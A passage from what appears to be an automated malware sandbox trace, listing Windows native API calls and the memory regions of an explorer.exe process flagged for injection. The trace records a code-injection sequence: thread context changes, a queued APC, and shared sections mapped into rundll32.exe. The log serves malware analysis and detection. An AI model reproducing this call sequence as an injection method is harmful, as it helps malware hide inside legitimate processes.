[252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0076.839] NtSetContextThread (ThreadHandle=0x90, Context=0x45da30*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xb0, [73]=0x0, [74]=0xd5, [75]=0x3, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100fc, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x113, SegCs=0x0, EFlags=0x5, Esp=0x0, SegSs=0x100fc, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x5, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0x98, [46]=0x89, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0076.839] NtQueueApcThread (ThreadHandle=0x90, ApcRoutine=0x7899909, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0076.843] NtResumeThread (in: ThreadHandle=0x90, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0076.844] NtClose (Handle=0x8c) returned 0x0 [0076.844] NtClose (Handle=0x90) returned 0x0 [0076.844] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x45dc34 | out: BaseAddress=0x45dc34*=0x766d0000) returned 0x0 [0076.870] PostThreadMessageW (idThread=0x460, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0076.918] NtDelayExecution (Alertable=0, Interval=0x45dcac*=-30000000) returned 0x0 [0080.239] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x78df000, Buffer=0x45dcd0, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x45dcd0*, NumberOfBytesRead=0x0) returned 0x0 [0080.239] NtClose (Handle=0x40) returned 0x0 [0080.240] NtOpenProcess (in: ProcessHandle=0x45edac, DesiredAccess=0x438, ObjectAttributes=0x45e66c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x45e640*(UniqueProcess=0xfa0, UniqueThread=0x0) | out: ProcessHandle=0x45edac*=0x40) returned 0x0 [0080.243] NtOpenThread (in: ThreadHandle=0x45edb0, DesiredAccess=0x1a, ObjectAttributes=0x45e66c, ClientId=0x45e638*(UniqueProcess=0x0, UniqueThread=0xfa4) | out: ThreadHandle=0x45edb0*=0xa0) returned 0x0 [0080.243] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\rundll32.exe", NtPathName=0x45dc70, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\rundll32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.243] NtCreateFile (in: FileHandle=0x45dc90, DesiredAccess=0x120089, ObjectAttributes=0x45dc58*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\rundll32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x45dc78, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x45dc90*=0xa4, IoStatusBlock=0x45dc78*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.244] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x774e08) returned 1 [0080.244] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x45dc78, FileInformation=0x45dbd0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x45dc78, FileInformation=0x45dbd0) returned 0x0 [0080.244] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xb200) returned 0x774e08 [0080.248] NtReadFile (in: FileHandle=0xa4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x45dc78, Buffer=0x774e08, BufferLength=0xae00, ByteOffset=0x45dbe8*=0, Key=0x0 | out: IoStatusBlock=0x45dc78, Buffer=0x774e08*) returned 0x0 [0080.251] NtClose (Handle=0xa4) returned 0x0 [0080.251] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xe001) returned 0x780010 [0080.252] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x774e08) returned 1 [0080.252] NtQueryInformationProcess (in: ProcessHandle=0x40, ProcessInformationClass=0x0, ProcessInformation=0x45dfdc, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x45dfdc, ReturnLength=0x0) returned 0x0 [0080.252] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x7efde008, Buffer=0x45eba0, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x45eba0*, NumberOfBytesRead=0x0) returned 0x0 [0080.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x45e684*=0x20000, RegionSize=0x45e688, FreeType=0x8000) returned 0x0 [0080.253] NtReadVirtualMemory (in: ProcessHandle=0x40, BaseAddress=0x350000, Buffer=0x780010, NumberOfBytesToRead=0xe000, NumberOfBytesRead=0x0 | out: Buffer=0x780010*, NumberOfBytesRead=0x0) returned 0x0 [0080.254] NtCreateSection (in: SectionHandle=0x45ee3c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x45e690, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x45ee3c*=0xa4) returned 0x0 [0080.255] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x45ee38*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45e690*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45ee38*=0x1e0000, SectionOffset=0x0, ViewSize=0x45e690*=0x29000) returned 0x0 [0080.255] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0x40, BaseAddress=0x45e8f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45eb24*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45e8f8*=0x70000, SectionOffset=0x0, ViewSize=0x45eb24*=0x29000) returned 0x0 [0080.256] NtCreateSection (in: SectionHandle=0x45eb98, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x45e6a0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x45eb98*=0xa8) returned 0x0 [0080.256] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x45eb9c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45e6a0*=0xe000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45eb9c*=0x20000, SectionOffset=0x0, ViewSize=0x45e6a0*=0xe000) returned 0x0 [0080.257] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x780010) returned 1 [0080.262] NtUnmapViewOfSection (ProcessHandle=0x40, BaseAddress=0x350000) returned 0x0 [0080.263] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0x40, BaseAddress=0x45eba0*=0x350000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x45edcc*=0xe000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x45eba0*=0x350000, SectionOffset=0x0, ViewSize=0x45edcc*=0xe000) returned 0x0 [0080.270] NtResumeThread (in: ThreadHandle=0xa0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0080.273] ExitProcess (uExitCode=0x0) Thread: id = 8 os_tid = 0xf9c Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x71de6000" os_pid = "0x45c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 522 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 523 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 524 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 525 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 526 start_va = 0x50000 end_va = 0x55fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 527 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 528 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 529 start_va = 0x80000 end_va = 0x8cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 530 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 531 start_va = 0xa0000 end_va = 0xa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 532 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 533 start_va = 0x130000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 534 start_va = 0x1a0000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 535 start_va = 0x2a0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 536 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 537 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 538 start_va = 0x300000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 539 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 540 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 541 start_va = 0x720000 end_va = 0x1b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 542 start_va = 0x1b20000 end_va = 0x1bfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b20000" filename = "" Region: id = 543 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 544 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 545 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 546 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 547 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 548 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 549 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 550 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 551 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 552 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 553 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 554 start_va = 0x1d40000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 555 start_va = 0x1da0000 end_va = 0x1da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001da0000" filename = "" Region: id = 556 start_va = 0x1db0000 end_va = 0x1db2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 557 start_va = 0x1dc0000 end_va = 0x1dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 558 start_va = 0x1dd0000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 559 start_va = 0x1e50000 end_va = 0x211efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 560 start_va = 0x2120000 end_va = 0x217bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 561 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 562 start_va = 0x2200000 end_va = 0x2205fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 563 start_va = 0x2210000 end_va = 0x2210fff 